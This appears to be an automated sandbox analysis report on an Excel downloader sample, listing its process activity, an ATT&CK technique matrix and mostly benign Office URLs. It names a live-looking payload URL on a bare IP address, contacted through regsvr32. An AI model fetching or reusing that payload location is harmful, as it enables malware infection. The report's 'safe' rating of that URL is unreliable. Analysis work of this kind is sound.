    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{A6C75FAA-30BC-4101-B3BB-4145B71653EC} - OProcSessId.datJump to behavior
    Source: EXCEL.EXEString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: EXCEL.EXEString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
    Source: EXCEL.EXEString found in binary or memory: https://store.office.de/addinstemplate
    Source: EXCEL.EXEString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
    Source: EXCEL.EXEString found in binary or memory: https://store.office.cn/addinstemplate
    Source: EXCEL.EXEString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
    Source: EXCEL.EXEString found in binary or memory: https://[OMEX.BaseHost]/api/addins/emailtemplate
    Source: EXCEL.EXEString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
    Source: EXCEL.EXEString found in binary or memory: https://addinsinstallation.store.office.com/app/download
    Source: EXCEL.EXEString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
    Source: EXCEL.EXEString found in binary or memory: https://api.addins.store.office.com/addinstemplate
    Source: EXCEL.EXEString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
    Source: EXCEL.EXEString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
    Source: classification engineClassification label: mal76.expl.evad.winXLSB@13/6@0/3
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: C:\Windows\SysWOW64\regsvr32.exeAutomated click: OK
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: ClaimCopy-46148734-12012021.xlsbInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: 26440000.1.drInitial sample: OLE zip file path = xl/media/image1.jpg
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
    Source: EXCEL.EXE, 00000001.00000002.751424491.000000000D5F6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW(?7
    Source: EXCEL.EXE, 00000001.00000003.604266706.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619683084.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622661724.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753480507.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599726900.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565438723.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618445946.000000000F35B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: EXCEL.EXE, 00000001.00000003.604266706.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.619683084.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.622661724.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.753480507.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599726900.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.565438723.000000000F35B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618445946.000000000F35B000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW,
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: EXCEL.EXE, 00000001.00000002.750257411.0000000002D80000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: EXCEL.EXE, 00000001.00000002.750257411.0000000002D80000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: EXCEL.EXE, 00000001.00000002.750257411.0000000002D80000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: EXCEL.EXE, 00000001.00000002.750257411.0000000002D80000.00000002.00020000.sdmpBinary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter2DLL Side-Loading1Process Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScripting2Boot or Logon Initialization ScriptsDLL Side-Loading1Disable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsExploitation for Client Execution22Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting2NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDLL Side-Loading1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    ClaimCopy-46148734-12012021.xlsb22%ReversingLabsDocument-Excel.Downloader.EncDoc

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://o365auditrealtimeingestion.manage.office.comBearer0%Avira URL Cloudsafe
    https://cdn.entity.0%URL Reputationsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://substrate.office.comj)0%Avira URL Cloudsafe
    http://schemas.open0%URL Reputationsafe
    https://settings.outlook.comS0%Avira URL Cloudsafe
    https://api.aadrm.com/0%URL Reputationsafe
    https://dev.cortak0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://officeci.azurewebsites.net/api/0%URL Reputationsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://incidents.diagnosticssdf.office.comej0%Avira URL Cloudsafe
    https://substrate.office.comn0%Avira URL Cloudsafe
    https://substrate.office.coml0%Avira URL Cloudsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://substrate.office.como0%Avira URL Cloudsafe
    https://substrate.office.comx0%Avira URL Cloudsafe
    https://substrate.office.coma0%Avira URL Cloudsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://substrate.office.comP0%Avira URL Cloudsafe
    https://api.diagnostics.office.comom0%Avira URL Cloudsafe
    https://devnull.onenote.comMBI_SSL_SHORT0%Avira URL Cloudsafe
    http://146.19.170.39/710276824738.dat0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://dataservice.o365filtering.comsyz0%Avira URL Cloudsafe
    https://powerlift.acompli.netU0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://146.19.170.39/710276824738.datfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://shell.suite.office.com:1443EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
      		high
      https://login.windows-ppe.net/common/oauth2/authorize3EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
        		high
        https://autodiscover-s.outlook.com/EXCEL.EXE, 00000001.00000002.751574667.000000000D65E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289495071.0000000012AA6000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
          		high
          https://api.powerbi.com/v1.0/myorg/datasets3hEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
            		high
            https://o365auditrealtimeingestion.manage.office.comBearerEXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
              		high
              https://cdn.entity.3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
              • URL Reputation: safe
              		unknown
              https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                		high
                https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize6zEXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmpfalse
                  		high
                  https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                  • URL Reputation: safe
                  		unknown
                  https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                    		high
                    https://substrate.office.comj)EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                    • Avira URL Cloud: safe
                    		low
                    http://schemas.openEXCEL.EXE, 00000001.00000003.601454443.0000000015BA8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602979936.0000000015B01000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.617660841.0000000015B01000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601358509.0000000015BEB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.603033362.0000000015B37000.00000004.00000001.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754897882.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660254465.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.738795485.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.601531308.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620631853.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599092509.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.291961394.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564407313.0000000012B6C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.623747505.0000000012B6C000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                      		high
                      https://settings.outlook.comSEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                        		high
                        https://cloudfiles.onenote.com/upload.aspxOneNoteCloudFilesConsumerEmbedhttps://onedrive.live.com/emEXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpfalse
                          		high
                          https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrMBI_SSL_SHORTssl.EXCEL.EXE, 00000001.00000002.751546889.000000000D65A000.00000004.00000001.sdmpfalse
                            		high
                            https://api.aadrm.com/EXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://lookup.onenote.com/lookup/geolocation/v1TEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                              		high
                              https://api.powerbi.com/beta/myorg/imports?UEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                		high
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesEXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                  		high
                                  https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveAppEXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmpfalse
                                    		high
                                    https://api.microsoftstream.com/api/EXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                      		high
                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveEXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                        		high
                                        https://cr.office.comEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                          		high
                                          https://dev.cortakEXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://res.getmicrosoftkey.com/api/redemptioneventsEXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                          • URL Reputation: safe
                                          		unknown
                                          https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-androidUserVoiceOfEXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpfalse
                                            		high
